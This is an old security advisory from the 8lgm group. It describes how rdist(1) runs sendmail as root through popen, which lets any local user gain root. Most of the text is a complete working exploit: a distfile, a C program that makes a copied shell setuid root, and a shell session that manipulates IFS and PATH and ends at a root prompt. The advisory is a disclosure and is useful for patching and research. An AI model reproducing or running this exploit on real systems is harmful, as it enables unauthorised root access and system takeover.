rdist(1) (/usr/ucb/rdist or /usr/bin/rdist)
rdist(1) uses popen(3) to execute sendmail(8) as root. It can therefore be made to execute arbitary programs as root.
Any user with access to rdist(1) can become root.
This example demonstrates how to become root on most affected machines by creating a set-uid root shell. Please do not do this unless you have permission.
Create the following file, 'distfile':
8<--------------------------- cut here ---------------------------- HOSTS = localhost FILES = BullInTheHeather ${FILES} -> ${HOSTS} install /tmp/1 ; notify user ; 8<--------------------------- cut here ----------------------------
Create the following file, 'usr.c':
8<--------------------------- cut here ---------------------------- main() { setuid(0); chown("sh", 0, 0); chmod("sh", 04755); exit(0); } 8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
> % cp /bin/sh . > % cc -o usr usr.c > % set path=(. $path) > % setenv IFS / > % rdist updating host localhost rdist: BullInTheHeather: No such file or directory notify @localhost ( user )
> % ls -l -rwsr-xr-x 1 root 106496 Mar 4 00:25 sh > % ./sh #
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
System Administrators are encouraged to contact us for any other information they may require about the problems described in this advisory.
We welcome reports about which platforms this flaw does or does not exist on.